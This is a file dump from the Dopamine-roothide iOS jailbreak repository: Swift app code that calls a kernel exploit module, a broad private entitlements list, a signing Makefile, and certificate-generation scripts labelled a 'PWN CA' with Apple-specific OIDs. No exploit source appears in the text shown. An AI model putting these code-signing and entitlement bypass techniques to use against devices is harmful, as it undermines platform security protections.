/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@1x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@1x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy 2.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Artboard copy.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Artboard.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "Artboard copy 2.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | }, 23 | "properties" : { 24 | "template-rendering-intent" : "template" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Pinauten_Logo_SecResearch_4096 copy 2.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Pinauten_Logo_SecResearch_4096 copy.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "Pinauten_Logo_SecResearch_4096.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | }, 23 | "properties" : { 24 | "template-rendering-intent" : "template" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy 2.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "discord-mark-white.png", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | }, 21 | "properties" : { 22 | "template-rendering-intent" : "template" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/discord-mark-white.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/discord-mark-white.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "GitHub-Mark-64px.png", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | }, 21 | "properties" : { 22 | "template-rendering-intent" : "template" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/GitHub-Mark-64px.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/GitHub-Mark-64px.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Sileo.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Sileo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Sileo.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Zebra.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Zebra.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Zebra.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_1024.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_2048.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_2048.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_4096.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_4096.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Dopamine-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // Use this file to import your target's public headers that you would like to expose to Swift. 3 | // 4 | 5 | #include 6 | 7 | #include "posix_spawn.h" 8 | #include "LSApplicationWorkspace.h" 9 | #include "LSApplicationProxy.h" 10 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Dopamine.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.private.security.storage.AppBundles 6 | 7 | com.apple.private.security.storage.AppDataContainers 8 | 9 | com.apple.security.get-task-allow 10 | 11 | get-task-allow 12 | 13 | platform-application 14 | 15 | task_for_pid-allow 16 | 17 | run-unsigned-code 18 | 19 | proc_info-allow 20 | 21 | com.apple.private.persona-mgmt 22 | 23 | com.apple.private.tcc.allow 24 | 25 | kTCCServiceSystemPolicyAllFiles 26 | 27 | com.apple.private.security.storage-exempt.heritable 28 | 29 | com.apple.private.security.storage.AppBundles 30 | 31 | com.apple.private.security.no-sandbox 32 | 33 | com.apple.springboard.CFUserNotification 34 | 35 | com.apple.springboard.launchapplications 36 | 37 | com.apple.security.network.client 38 | 39 | com.apple.system-task-ports.control 40 | 41 | com.apple.system-task-ports.token.control 42 | 43 | com.apple.private.mobileinstall.allowedSPI 44 | 45 | InstallForLaunchServices 46 | Install 47 | UninstallForLaunchServices 48 | Uninstall 49 | UpdatePlaceholderMetadata 50 | 51 | com.apple.private.spawn-driver 52 | 53 | com.apple.developer.driverkit 54 | 55 | com.apple.developer.driverkit.transport.pci 56 | 57 | com.apple.developer.driverkit.builtin 58 | 59 | com.apple.developer.driverkit.transport.pci.offloadEngineDisable 60 | 61 | com.apple.private.security.kext-collection-management 62 | 63 | com.apple.private.security.kext-management 64 | 65 | com.apple.private.security.syspolicy.kext-management 66 | 67 | com.apple.security.exception.mach-lookup.global-name 68 | 69 | com.opa334.jailbreakd 70 | 71 | com.apple.security.exception.iokit-user-client-class 72 | 73 | AGXDeviceUserClient 74 | IOSurfaceRootUserClient 75 | 76 | com.apple.wifi.manager-access 77 | 78 | com.apple.security.exception.shared-preference.read-write 79 | 80 | com.opa334.Dopamine.roothide 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/DopamineApp.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Fugu15App.swift 3 | // Fugu15 4 | // 5 | // Created by Linus Henze. 6 | // 7 | 8 | import SwiftUI 9 | 10 | var whatCouldThisVariablePossiblyEvenMean = { 11 | let date = Date() 12 | let calendar = Calendar.current 13 | let components = calendar.dateComponents([.day, .month], from: date) 14 | 15 | return components.day == 1 && components.month == 4 16 | }() 17 | 18 | struct Fugu15App: App { 19 | var body: some Scene { 20 | WindowGroup { 21 | JailbreakView() 22 | } 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | TSRootBinaries 6 | 7 | oobPCI 8 | tar 9 | 10 | UIViewControllerBasedStatusBarAppearance 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/JailbreakView.swift: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/JailbreakView.swift -------------------------------------------------------------------------------- /Dopamine/Dopamine/Preview Content/Preview Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Classes/Logger.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Logger.swift 3 | // Fugu15 4 | // 5 | // Created by exerhythm on 29.03.2023. 6 | // 7 | 8 | import SwiftUI 9 | 10 | struct LogMessage: Equatable, Identifiable { 11 | var id = UUID() 12 | var text: String 13 | var type: LogType 14 | 15 | enum LogType: RawRepresentable { 16 | case instant 17 | case continuous 18 | case success 19 | case error 20 | 21 | var rawValue: String { 22 | switch self { 23 | case .instant, .continuous: 24 | return "[*]" 25 | case .success: 26 | return "[+]" 27 | case .error: 28 | return "E:" 29 | } 30 | } 31 | 32 | init?(rawValue: String) { 33 | switch rawValue { 34 | case "[*]": 35 | self = .instant 36 | case "[+]": 37 | self = .success 38 | case "E:": 39 | self = .error 40 | default: 41 | return nil 42 | } 43 | } 44 | } 45 | } 46 | 47 | class Logger: ObservableObject { 48 | @Published var userFriendlyLogs: [LogMessage] = [] 49 | @Published var log: String = "" 50 | 51 | static var shared = Logger() 52 | 53 | /** 54 | * Add a string to log view. 55 | * 56 | * - Parameter text: The text to display 57 | * - Parameter isContinuous: Determines whether the action is instant or continuous, and if a spinner next to text should be shown 58 | * - Parameter isStatus: Should the log be displayed to users who have "Simple Logs" option turned on 59 | */ 60 | static func log(_ obj: Any, type: LogMessage.LogType = .continuous, isStatus: Bool = false) { 61 | let text = String(describing: obj) 62 | print(text) 63 | shared.log += "\n\(type.rawValue) \(text)" 64 | if isStatus { 65 | shared.userFriendlyLogs.append(.init(text: NSLocalizedString(text, comment: "Jailbreak Status"), type: type)) 66 | } 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Extensions/Error++.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Error++.swift 3 | // Fugu15 4 | // 5 | // Created by sourcelocation on 17/04/2023. 6 | // 7 | 8 | import Foundation 9 | 10 | extension String: LocalizedError { 11 | public var errorDescription: String? { return self } 12 | } 13 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Views/MaterialView.swift: -------------------------------------------------------------------------------- 1 | // 2 | // MaterialView.swift 3 | // DebToIPA 4 | // 5 | // Created by exerhythm on 18.10.2022. 6 | // 7 | 8 | import SwiftUI 9 | 10 | struct MaterialView: UIViewRepresentable { 11 | let material: UIBlurEffect.Style 12 | 13 | init(_ material: UIBlurEffect.Style) { 14 | self.material = material 15 | } 16 | 17 | func makeUIView(context: Context) -> UIVisualEffectView { 18 | UIVisualEffectView(effect: UIBlurEffect(style: material)) 19 | } 20 | 21 | func updateUIView(_ uiView: UIVisualEffectView, context: Context) { 22 | uiView.effect = UIBlurEffect(style: material) 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/UI/Views/PopupView.swift: -------------------------------------------------------------------------------- 1 | // 2 | // AlertView.swift 3 | // Dopamine 4 | // 5 | // Created by sourcelocation on 30/04/2023. 6 | // 7 | 8 | import SwiftUI 9 | 10 | struct PopupView: View { 11 | 12 | @ViewBuilder var title: Title 13 | @ViewBuilder var contents: Content 14 | 15 | @Binding var isPresented: Bool 16 | 17 | var body: some View { 18 | VStack { 19 | ZStack { 20 | if isPresented { 21 | Color.black 22 | .ignoresSafeArea() 23 | .opacity(0.6) 24 | .onTapGesture { 25 | isPresented = false 26 | } 27 | .zIndex(2) 28 | VStack { 29 | title 30 | 31 | Divider() 32 | .background(.white) 33 | .padding(.horizontal, 32) 34 | .opacity(0.25) 35 | .frame(maxWidth: 320) 36 | 37 | contents 38 | } 39 | .padding(.vertical) 40 | .transition(.opacity.combined(with: .scale(scale: 0.9))) 41 | .background(MaterialView(.systemUltraThinMaterialDark) 42 | .cornerRadius(16)) 43 | .zIndex(3) 44 | } 45 | 46 | } 47 | .foregroundColor(.white) 48 | .animation(.spring().speed(1.5), value: isPresented) 49 | } 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/Dopamine.roothide: -------------------------------------------------------------------------------- 1 | 1 2 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/bootstrap-iphoneos-arm64.tar.zst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/bootstrap/bootstrap-iphoneos-arm64.tar.zst -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/libjbdrw.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/bootstrap/libjbdrw.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/roothideapp.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/bootstrap/roothideapp.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/sileo.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/bootstrap/sileo.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/bootstrap/zebra.deb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/bootstrap/zebra.deb -------------------------------------------------------------------------------- /Dopamine/Dopamine/include/_LSApplicationState.h: -------------------------------------------------------------------------------- 1 | /* 2 | * This header is generated by classdump-dyld 1.0 3 | * on Friday, January 21, 2022 at 6:51:04 AM Pacific Standard Time 4 | * Operating System: Version 15.2.1 (Build 19C63) 5 | * Image Source: /System/Library/Frameworks/CoreServices.framework/CoreServices 6 | * classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. 7 | */ 8 | 9 | #import 10 | //#import 11 | //#import 12 | //#import 13 | 14 | @class NSString; 15 | 16 | @interface _LSApplicationState : NSObject { 17 | 18 | NSString* _bundleIdentifier; 19 | unsigned long long _stateFlags; 20 | int _ratingRank; 21 | unsigned long long _installType; 22 | 23 | } 24 | 25 | @property (nonatomic,readonly) unsigned long long installType; 26 | @property (nonatomic,copy,readonly) NSString * bundleIdentifier; //@synthesize bundleIdentifier=_bundleIdentifier - In the implementation block 27 | @property (getter=isInstalled,nonatomic,readonly) BOOL installed; 28 | @property (getter=isPlaceholder,nonatomic,readonly) BOOL placeholder; 29 | @property (getter=isValid,nonatomic,readonly) BOOL valid; 30 | @property (getter=isRestricted,nonatomic,readonly) BOOL restricted; 31 | @property (getter=isRemovedSystemApp,nonatomic,readonly) BOOL removedSystemApp; 32 | @property (getter=isBlocked,nonatomic,readonly) BOOL blocked; 33 | @property (getter=isAlwaysAvailable,nonatomic,readonly) BOOL alwaysAvailable; 34 | @property (getter=isDowngraded,nonatomic,readonly) BOOL downgraded; 35 | +(BOOL)supportsSecureCoding; 36 | -(BOOL)isInstalled; 37 | -(void)addStateFlag:(unsigned long long)arg1 ; 38 | -(void)encodeWithCoder:(id)arg1 ; 39 | -(BOOL)isRemovedSystemApp; 40 | -(unsigned long long)installType; 41 | -(BOOL)isPlaceholder; 42 | -(BOOL)isRestricted; 43 | -(BOOL)isBlocked; 44 | -(id)description; 45 | -(id)initWithBundleIdentifier:(id)arg1 stateFlags:(unsigned long long)arg2 ratingRank:(int)arg3 installType:(unsigned long long)arg4 ; 46 | -(id)initWithCoder:(id)arg1 ; 47 | -(id)copyWithZone:(NSZone*)arg1 ; 48 | -(NSString *)bundleIdentifier; 49 | -(BOOL)isDowngraded; 50 | -(BOOL)isAlwaysAvailable; 51 | -(BOOL)isValid; 52 | @end 53 | 54 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/main.swift: -------------------------------------------------------------------------------- 1 | // 2 | // main.swift 3 | // Fugu15 4 | // 5 | // Created by Linus Henze on 2022-07-29. 6 | // 7 | 8 | import Foundation 9 | import Fugu15KernelExploit 10 | 11 | if CommandLine.arguments.count > 1 { 12 | switch CommandLine.arguments[1] { 13 | case "removeFuguInstallPlist": 14 | let path = Bundle.main.bundleURL 15 | 16 | let plist = path.appendingPathComponent("FuguInstall.plist") 17 | try? FileManager.default.removeItem(at: plist) 18 | 19 | exit(0) 20 | 21 | default: 22 | break 23 | } 24 | } 25 | 26 | Fugu15.mainHook() 27 | 28 | if isJailbroken() { 29 | let rootPrefix = rootifyPath(path: "") 30 | if rootPrefix != nil { 31 | setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:\(rootPrefix!)/sbin:\(rootPrefix!)/bin:\(rootPrefix!)/usr/sbin:\(rootPrefix!)/usr/bin", 1) 32 | } 33 | 34 | let dpDefaults = dopamineDefaults() 35 | let safeModePath = rootifyPath(path: "basebin/.safe_mode") 36 | let safeModeState = FileManager.default.fileExists(atPath: safeModePath!) 37 | dpDefaults.set(!safeModeState, forKey: "tweakInjectionEnabled") 38 | } 39 | 40 | Fugu15App.main() 41 | -------------------------------------------------------------------------------- /Dopamine/Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: all clean build_clean 2 | 3 | all: Dopamine.tipa 4 | 5 | Dopamine.tipa: build/Build/Products/Debug-iphoneos/Dopamine.app 6 | @echo Ad-Hoc signing Dopamine 7 | xattr -rc build/Build/Products/Debug-iphoneos/Dopamine.app 8 | ldid -SDopamine/Dopamine.entitlements build/Build/Products/Debug-iphoneos/Dopamine.app/Dopamine 9 | ldid -s build/Build/Products/Debug-iphoneos/Dopamine.app 10 | rm -rf Payload Dopamine.tipa 11 | mkdir Payload 12 | cp -r build/Build/Products/Debug-iphoneos/Dopamine.app Payload/Dopamine.app 13 | zip -Ar Dopamine.tipa Payload 14 | rm -rf Payload 15 | 16 | build/Build/Products/Debug-iphoneos/Dopamine.app: FORCE 17 | xcodebuild -scheme Dopamine -derivedDataPath build -destination 'generic/platform=iOS' CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO 18 | 19 | clean: 20 | rm -rf build Payload Dopamine.tipa 21 | 22 | build_clean: 23 | rm -rf Payload build 24 | 25 | FORCE: ; 26 | -------------------------------------------------------------------------------- /Dopamine/localization_keys.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | plutil -convert json "$1".lproj/Localizable.strings -o - | ruby -r json -e 'puts JSON.parse(STDIN.read).keys.sort' 3 | -------------------------------------------------------------------------------- /Dopamine/sort_localizations.sh: -------------------------------------------------------------------------------- 1 | localisort -t ./en.lproj/Localizable.strings -i ./ar.lproj/Localizable.strings -ct -r 2 | localisort -t ./en.lproj/Localizable.strings -i ./da.lproj/Localizable.strings -ct -r 3 | localisort -t ./en.lproj/Localizable.strings -i ./de.lproj/Localizable.strings -ct -r 4 | localisort -t ./en.lproj/Localizable.strings -i ./el.lproj/Localizable.strings -ct -r 5 | localisort -t ./en.lproj/Localizable.strings -i ./fil.lproj/Localizable.strings -ct -r 6 | localisort -t ./en.lproj/Localizable.strings -i ./fr.lproj/Localizable.strings -ct -r 7 | localisort -t ./en.lproj/Localizable.strings -i ./ja.lproj/Localizable.strings -ct -r 8 | localisort -t ./en.lproj/Localizable.strings -i ./kk.lproj/Localizable.strings -ct -r 9 | localisort -t ./en.lproj/Localizable.strings -i ./ko.lproj/Localizable.strings -ct -r 10 | localisort -t ./en.lproj/Localizable.strings -i ./nl.lproj/Localizable.strings -ct -r 11 | localisort -t ./en.lproj/Localizable.strings -i ./pl.lproj/Localizable.strings -ct -r 12 | localisort -t ./en.lproj/Localizable.strings -i ./pt-BR.lproj/Localizable.strings -ct -r 13 | localisort -t ./en.lproj/Localizable.strings -i ./ru.lproj/Localizable.strings -ct -r 14 | localisort -t ./en.lproj/Localizable.strings -i ./sv.lproj/Localizable.strings -ct -r 15 | localisort -t ./en.lproj/Localizable.strings -i ./tr.lproj/Localizable.strings -ct -r 16 | localisort -t ./en.lproj/Localizable.strings -i ./uk.lproj/Localizable.strings -ct -r 17 | localisort -t ./en.lproj/Localizable.strings -i ./ur.lproj/Localizable.strings -ct -r 18 | localisort -t ./en.lproj/Localizable.strings -i ./vi.lproj/Localizable.strings -ct -r 19 | localisort -t ./en.lproj/Localizable.strings -i ./zh_CN.lproj/Localizable.strings -ct -r 20 | localisort -t ./en.lproj/Localizable.strings -i ./zh_HK.lproj/Localizable.strings -ct -r 21 | localisort -t ./en.lproj/Localizable.strings -i ./zh_TW.lproj/Localizable.strings -ct -r 22 | localisort -t ./en.lproj/Localizable.strings -i ./zh-Hans.lproj/Localizable.strings -ct -r -------------------------------------------------------------------------------- /Exploits/fastPath/arm.pfx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Exploits/fastPath/arm.pfx -------------------------------------------------------------------------------- /Exploits/fastPath/ca.conf: -------------------------------------------------------------------------------- 1 | [ ca ] 2 | # `man ca` 3 | default_ca = default_ca 4 | 5 | [ default_ca ] 6 | dir = . 7 | private_key = $dir/ca.key 8 | certificate = $dir/ca.crt 9 | policy = policy_loose 10 | new_certs_dir = $dir/nCerts 11 | database = $dir/index.txt 12 | serial = $dir/serial 13 | RANDFILE = $dir/private/.rand 14 | 15 | [ policy_loose ] 16 | # Allow the intermediate CA to sign a more diverse range of certificates. 17 | # See the POLICY FORMAT section of the `ca` man page. 18 | countryName = optional 19 | stateOrProvinceName = optional 20 | localityName = optional 21 | organizationName = optional 22 | organizationalUnitName = optional 23 | commonName = supplied 24 | emailAddress = optional 25 | 26 | [ req ] 27 | # Options for the `req` tool (`man req`). 28 | default_bits = 2048 29 | distinguished_name = req_distinguished_name 30 | string_mask = utf8only 31 | 32 | # SHA-1 is deprecated, so use SHA-2 instead. 33 | default_md = sha256 34 | 35 | # Extension to add when the -x509 option is used. 36 | x509_extensions = v3_ca 37 | 38 | [ req_distinguished_name ] 39 | # See . 40 | countryName = Country Name (2 letter code) 41 | stateOrProvinceName = State or Province Name 42 | localityName = Locality Name 43 | 0.organizationName = Organization Name 44 | organizationalUnitName = Organizational Unit Name 45 | commonName = Common Name 46 | emailAddress = Email Address 47 | 48 | # Optionally, specify some defaults. 49 | countryName_default = DE 50 | stateOrProvinceName_default = Germany 51 | localityName_default = Boppard 52 | 0.organizationName_default = Pinauten GmbH 53 | organizationalUnitName_default = Pinauten 54 | emailAddress_default = contact@pinauten.de 55 | commonName_default = Pinauten PWN CA 56 | 57 | [ v3_ca ] 58 | # Extensions for a typical CA (`man x509v3_config`). 59 | basicConstraints = critical, CA:true 60 | keyUsage = critical, digitalSignature, keyCertSign 61 | extendedKeyUsage = codeSigning 62 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 63 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 64 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 65 | 66 | [ v3_intermediate_ca ] 67 | # Extensions for a typical CA (`man x509v3_config`). 68 | basicConstraints = critical, CA:true 69 | keyUsage = critical, digitalSignature, keyCertSign 70 | extendedKeyUsage = codeSigning 71 | 1.2.840.113635.100.6.22 = critical,ASN1:NULL 72 | 1.2.840.113635.100.6.1.3 = critical,ASN1:NULL 73 | 1.2.840.113635.100.6.1.25.1 = critical,ASN1:NULL 74 | -------------------------------------------------------------------------------- /Exploits/fastPath/clean.sh: -------------------------------------------------------------------------------- 1 | rm -f index.txt.* index.txt ca.key ca.crt cbd.crt itd.crt itd.key itd.csr.pem usr_arm.crt usr_arm.csr.pem usr_arm.key usr_x86_64.crt usr_x86_64.csr.pem usr_x86_64.key serial serial.* 2 | rm -rf ncerts 3 | -------------------------------------------------------------------------------- /Exploits/fastPath/genCrt.sh: -------------------------------------------------------------------------------- 1 | set -e 2 | 3 | openssl genrsa -out ca.key 2048 4 | openssl genrsa -out itd.key 2048 5 | openssl genrsa -out usr_x86_64.key 2048 6 | openssl genrsa -out usr_arm.key 2048 7 | 8 | openssl req -new -x509 -key ca.key -out ca.crt -config ca.conf -days 3650 -batch 9 | openssl req -config itd.conf -new -sha256 -key itd.key -out itd.csr.pem -batch 10 | openssl req -config usr_x86_64.conf -new -sha256 -key usr_x86_64.key -out usr_x86_64.csr.pem -batch 11 | openssl req -config usr_arm.conf -new -sha256 -key usr_arm.key -out usr_arm.csr.pem -batch 12 | 13 | echo 1000 > 